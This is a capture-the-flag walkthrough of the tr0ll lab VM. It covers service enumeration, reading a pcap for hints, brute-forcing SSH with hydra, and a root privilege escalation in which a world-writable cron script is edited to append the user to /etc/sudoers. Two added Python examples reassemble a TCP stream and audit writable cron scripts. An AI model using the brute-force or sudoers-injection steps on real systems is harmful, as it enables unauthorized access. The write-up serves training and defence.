
tr0ll

Posted in CTF





Our initial scan yields:

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (EdDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 1 disallowed entry 
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

We’ll enumerate these three services to get a good understanding of the possible vectors, widening our view of the attack surface and reducing time wasted in rabbit holes.

  • FTP
  • SSH
  • HTTP

FTP

Starting with FTP, we can verify that the service really is FTP (vsftpd) and that it allows anonymous login.

root@kali:/usr/share/nmap/scripts# nmap -sV 192.168.72.138
root@kali:/usr/share/nmap/scripts# nmap --script ftp-anon.nse 192.168.72.138 -p21

Our initial scan was correct. We can now log in over FTP anonymously to do some initial investigation.

root@kali:/home# ftp 192.168.72.138
Connected to 192.168.72.138.
220 (vsFTPd 3.0.2)
Name (192.168.72.138:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        112          4096 Aug 10  2014 .
drwxr-xr-x    2 0        112          4096 Aug 10  2014 ..
-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap
226 Directory send OK.

Trying to PUT or traverse into other directories is futile, but all hope is not lost. We are able to capture a lone file: lol.pcap

We are able to GET this file and save it to our local machine. Before we commit to this vector, we’ll enumerate the other services - we can put this at the top of our todo list.


SSH

Since SSH is a common and relatively secure service, we won’t consider it low-hanging fruit.

We can verify the SSH service and check whether the root user accepts password authentication (which it does).

root@kali:/# nmap -sV 192.168.72.138 -p22
root@kali:/# ssh -vvv root@192.168.72.138

We can try to brute force ssh as root, but we’ll put that near the end of the list.


HTTP

Running Nikto, a few things come up, but nothing really juicy.

  • Apache/2.4.7
  • OS: Ubuntu
  • 1 entry in robots.txt: /secret
  • Apache default README page
  • Two images, on the pages /index.html & /secret/index.html

We can use curl to verify headers and check if anything jumps out at us.

root@kali:/# curl -i -L 192.168.72.138
root@kali:/# curl -i -L 192.168.72.138/secret
root@kali:/# curl -i -L 192.168.72.138/robots.txt

Nothing really. Let’s brute force some directories.

root@kali:/# dirb http://192.168.72.138
root@kali:/# gobuster -u http://192.168.72.138 -e -s '200,403,204,500' -w /usr/share/seclists/Discovery/Web_Content/apache.txt

Just what we’d already found with Nikto.

We can always run some larger wordlists to dig into the webserver further - we can put that on our todo list near the end as well.


Plan of Attack

  1. Investigate lol.pcap
  2. Brute force SSH with root or found usernames
  3. Run large wordlist (which we can do in the background)

We’ve downloaded the lol.pcap file, which we can open in Wireshark.

Following the TCP stream in this packet capture gives an idea of what the file contains. Make sure to remove the filter afterwards to see the important part.

Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P

Sucks, you were so close... gotta TRY HARDER!
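Wireshark’s “Follow TCP Stream” is doing two things here: filtering the capture down to one connection and stitching the TCP segments back into the byte stream in sequence-number order. As an added example (my code, not part of the original post and not from any tool it mentions), here is a small classic-pcap reader that does the same for an Ethernet/IPv4/TCP capture, including out-of-order segments and a retransmission. The capture it reads is constructed in-line with hypothetical addresses (10.0.0.1/10.0.0.2, ports 1337/40000); checksums are left at zero because nothing validates them.

```python
import socket
import struct

PCAP_MAGIC = 0xA1B2C3D4      # classic pcap magic as written by a little-endian host
LINKTYPE_ETHERNET = 1


def build_tcp_frame(src_ip, dst_ip, sport, dport, seq, payload):
    """Constructed Ethernet/IPv4/TCP frame used only as test input (checksums zero)."""
    eth = b"\x00" * 12 + struct.pack("!H", 0x0800)                       # EtherType IPv4
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return eth + ip + tcp


def build_pcap(frames):
    """Wrap frames in a classic pcap global header plus one 16-byte record header each."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1407628800 + i, 0, len(frame), len(frame)) + frame
    return out


def parse_frame(frame):
    """Return (src, sport, dst, dport, seq, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or struct.unpack_from("!H", frame, 12)[0] != 0x0800:
        return None                                  # not IPv4 (e.g. ARP)
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                         # IPv4 header length honours options
    if ip[9] != 6:                                   # protocol field: 6 == TCP
        return None
    total_len = struct.unpack_from("!H", ip, 2)[0]
    tcp = ip[ihl:total_len]
    sport, dport, seq = struct.unpack_from("!HHI", tcp, 0)
    data_off = (tcp[12] >> 4) * 4                    # TCP header length honours options
    src, dst = socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20])
    return src, sport, dst, dport, seq, tcp[data_off:]


def parse_pcap(data):
    """Yield parsed TCP packets from classic pcap bytes; both byte orders handled."""
    magic = struct.unpack_from("<I", data, 0)[0]
    if magic == PCAP_MAGIC:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    if struct.unpack_from(endian + "I", data, 20)[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet link type handled")
    offset = 24
    while offset + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack_from(endian + "IIII", data, offset)
        if offset + 16 + incl_len > len(data):
            break                                    # truncated final record
        pkt = parse_frame(data[offset + 16:offset + 16 + incl_len])
        offset += 16 + incl_len
        if pkt:
            yield pkt


def follow_stream(pcap_bytes, endpoint_a, endpoint_b):
    """Reassemble both directions of one connection, ordered by seq, ignoring retransmits."""
    forward, reverse = {}, {}
    for src, sport, dst, dport, seq, payload in parse_pcap(pcap_bytes):
        if not payload:
            continue
        if (src, sport) == endpoint_a and (dst, dport) == endpoint_b:
            forward.setdefault(seq, payload)         # first copy of a seq wins
        elif (src, sport) == endpoint_b and (dst, dport) == endpoint_a:
            reverse.setdefault(seq, payload)
    join = lambda segs: b"".join(segs[s] for s in sorted(segs))
    return join(forward), join(reverse)


CLIENT, SERVER = ("10.0.0.2", 40000), ("10.0.0.1", 1337)
# Constructed capture: out-of-order delivery, one retransmission, one ARP frame, one unrelated flow.
SAMPLE_PCAP = build_pcap([
    build_tcp_frame("10.0.0.2", "10.0.0.1", 40000, 1337, 1, b"hello "),
    build_tcp_frame("10.0.0.1", "10.0.0.2", 1337, 40000, 13, b"you almost found it\n"),
    b"\x00" * 12 + struct.pack("!H", 0x0806) + b"\x00" * 28,
    build_tcp_frame("10.0.0.1", "10.0.0.2", 1337, 40000, 1, b"Well, well, "),
    build_tcp_frame("10.0.0.1", "10.0.0.2", 1337, 40000, 1, b"Well, well, "),
    build_tcp_frame("10.0.0.2", "10.0.0.1", 40000, 1337, 7, b"world\n"),
    build_tcp_frame("10.0.0.9", "10.0.0.1", 5555, 80, 1, b"GET / HTTP/1.0\r\n"),
])

if __name__ == "__main__":
    c2s, s2c = follow_stream(SAMPLE_PCAP, CLIENT, SERVER)
    print("client -> server:", c2s)
    print("server -> client:", s2c)
```

Reading an actual lol.pcap with this only needs `follow_stream(open("lol.pcap", "rb").read(), a, b)` with the two endpoints taken from the packet list; the point of the dictionary keyed by sequence number is that the conversation comes out readable even when the capture order is not the transmission order.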

Going to http://192.168.72.138/sup3rs3cr3tdirlol gives us a directory listing containing an ELF file named roflmao.

Downloading it to our local machine and digging into it, we see a hint.

root@kali:~/Downloads# file roflmao 
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped
root@kali:~/Downloads# strings roflmao 
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
printf
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Find address 0x0856BF to proceed
;*2$"
GCC: (Ubuntu 4.8.2-19ubuntu1) 4.8.2

“Find address 0x0856BF to proceed.” Using this string as a directory name, we find another listing of files.

Two folders with two files. One looks like a good user list and the other folder “this_folder_contains_the_password” has a file of “Pass.txt” containing the string: Good_job_:)

Trying the newly created userlist (tru.txt) with the password string should yield a successful SSH login, right? Or maybe via FTP? Wrong (I tried).

Since the name of this machine is tr0ll, and we’ve seen it be sneaky previously, we can take a step back and look at the directory listing again. Nothing is hidden in the headers or source, but take another look at this: this_folder_contains_the_password/

“this_folder” - so the string pass.txt would technically be it, right? We’ll see…

root@kali:/# hydra -t 7 -L /home/tru.txt -p Pass.txt 192.168.72.138 ssh
..SNIP..
[22][ssh] host: 192.168.72.138   login: overflow   password: Pass.txt

A successful hit: overflow:Pass.txt

Logging in with these creds, we have a limited low-priv shell. Going through the basic Linux privilege escalation checklist, we get to the point where we search for world-writable directories.

$ find / -writable -type d 2>/dev/null
/tmp
/run/user/1002
/run/shm
/run/lock
/var/tmp
/sys/fs/cgroup/systemd/user/1002.user/14.session
/proc/4184/task/4184/fd
/proc/4184/fd
/proc/4184/map_files

Nothing in /tmp, but something in /var/tmp: a reference to an app called cleaner.py (which isn’t stock), along with a hint that it is run by a root cron job every 2 minutes.

$ cd /var/log
$ cat cronlog
*/2 * * * * cleaner.py

So let’s find this cleaner Python app. A basic locate or find command doesn’t bring us any luck, but the find command below (glob quoted so the shell doesn’t expand it locally) does yield something.

$ find / -name '*cleaner*' 2>/dev/null | grep cleaner.py

It’s located at /lib/log/cleaner.py AND it’s world-writable. Since it’s executed by root, we can alter the script to add our low-priv user to /etc/sudoers.

#!/usr/bin/env python
import os
import sys
try:
	os.system('echo "overflow ALL=(ALL:ALL) ALL" >> /etc/sudoers')
except:
	sys.exit()

Save it, wait the 2 minutes per the cronlog, then:

$ sudo su
sudo: unable to resolve host troll
[sudo] password for overflow: 
root@troll:~# whoami
root
root@troll:~# cat proof.txt 
Good job, you did it! 


702a8c18d29c6f3ca0d99ef5712bfbdc

Good stuff, we have root.
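The root cause of this whole chain is a root cron job executing a script that anyone on the box can edit. As an added example (my code, not from the original post or the tr0ll VM), here is a Python audit that parses crontab-style lines like the cronlog above, resolves each scheduled script, and reports the conditions that let a low-privilege user change what root runs: the file is world- or group-writable, not owned by root, or sits under a world-writable directory without the sticky bit. It assumes the 5-field user-crontab layout (no user column) and resolves bare names via a PATH= line in the crontab or a supplied search path; the directory layout it audits is constructed in a temp directory to mirror the post’s /lib/log/cleaner.py.

```python
import os
import shlex
import stat
import tempfile


def audit_cron_script(path):
    """Return findings describing who, other than root, could modify or replace this script."""
    findings = []
    st = os.stat(path)
    mode = stat.filemode(st.st_mode)
    if st.st_mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable (mode {mode})")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        findings.append(f"{path}: writable by non-root group gid {st.st_gid} (mode {mode})")
    if st.st_uid != 0:
        findings.append(f"{path}: owned by uid {st.st_uid}, not root")
    # A world-writable ancestor without the sticky bit lets any user rename or replace the file.
    d = os.path.dirname(os.path.abspath(path))
    while True:
        dst = os.stat(d)
        if dst.st_mode & stat.S_IWOTH and not dst.st_mode & stat.S_ISVTX:
            findings.append(f"{d}: ancestor directory world-writable without sticky bit")
        parent = os.path.dirname(d)
        if parent == d:
            break
        d = parent
    return findings


def resolve_script(command, search_path):
    """Locate the command's first word: absolute path as-is, otherwise along search_path."""
    try:
        first = shlex.split(command)[0]
    except (ValueError, IndexError):
        return None
    candidates = [first] if os.path.isabs(first) else [os.path.join(d, first) for d in search_path]
    return next((c for c in candidates if os.path.isfile(c)), None)


def audit_crontab(crontab_text, search_path=()):
    """Parse 5-field crontab lines (user-crontab format) and audit the script each one runs."""
    search_path = list(search_path)
    report = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("PATH="):                          # crontab may set its own PATH
            search_path = line[5:].strip('"').split(":") + search_path
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue
        schedule, command = " ".join(fields[:5]), fields[5]
        script = resolve_script(command, search_path)
        if script is None:
            report.append((schedule, command, [f"{command}: script not found on search path"]))
        else:
            report.append((schedule, command, audit_cron_script(script)))
    return report


def demo():
    """Constructed layout: a mode-0777 cleaner.py beside a sane 0755 script, both scheduled."""
    root = tempfile.mkdtemp()
    logdir = os.path.join(root, "lib", "log")
    os.makedirs(logdir)
    for name, body, mode in (("cleaner.py", "#!/usr/bin/env python\n", 0o777),
                             ("rotate.sh", "#!/bin/sh\n", 0o755)):
        p = os.path.join(logdir, name)
        with open(p, "w") as f:
            f.write(body)
        os.chmod(p, mode)
    crontab = f"PATH={logdir}:/usr/bin:/bin\n*/2 * * * * cleaner.py\n0 3 * * * rotate.sh\n"
    return audit_crontab(crontab)


if __name__ == "__main__":
    for schedule, command, findings in demo():
        print(f"{schedule}  {command}")
        for line in findings or ["ok"]:
            print("   ", line)
```

On a real host you would feed it `crontab -l` output for root (or the 6-field /etc/crontab with the user column stripped); the fix for a hit is the usual one, root ownership with mode 0755 or tighter, and a parent directory that unprivileged users cannot write to.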

